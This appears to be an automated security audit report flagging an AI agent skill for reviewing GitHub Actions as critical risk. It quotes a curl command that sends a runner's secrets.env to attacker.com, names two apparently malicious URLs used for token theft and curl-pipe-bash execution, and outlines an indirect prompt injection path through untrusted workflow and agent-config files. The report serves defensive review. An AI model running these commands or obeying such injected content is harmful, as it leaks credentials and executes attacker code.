gha-security-review
Fail
Audited by Gen Agent Trust Hub on Aug 14, 2026
Risk Level: CRITICALDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [DATA_EXFILTRATION]: Reference files contain active command patterns for stealing credentials. For instance,
references/runner-infrastructure.mdincludescurl -d @/home/runner/work/*/secrets.env https://attacker.com/collectfor file exfiltration.references/real-world-attacks.mddocuments a payload that exfiltrates theGITHUB_TOKENtohttps://recv.hackmoltrepeat.com/, which is identified as a malicious phishing domain.\n- [REMOTE_CODE_EXECUTION]: The skill documents real-world attack payloads using thecurl | bashpattern.references/real-world-attacks.mdspecifically includes the malicious URLhttps://hackmoltrepeat.com/moltas part of an RCE vector. Other references provide similar payloads using placeholder domains (e.g.,attacker.com) to demonstrate script injection via branch names and filenames.\n- [PROMPT_INJECTION]: Indirect Prompt Injection Risk (Category 8):\n - Ingestion points: The skill is designed to read and analyze untrusted content from GitHub Actions workflows, pull request diffs, and configuration files like
CLAUDE.mdandAGENTS.md(specified inSKILL.md).\n - Boundary markers: No delimiters or safety instructions are defined to separate the untrusted CI data from the agent's core instructions.\n
- Capability inventory: The skill uses high-capability tools including
Read,Bash, andTask.\n - Sanitization: There is no documented sanitization or validation of the ingested files before processing.
Recommendations
- AI detected serious security threats
- Contains 2 malicious URL(s) - DO NOT USE
Audit Metadata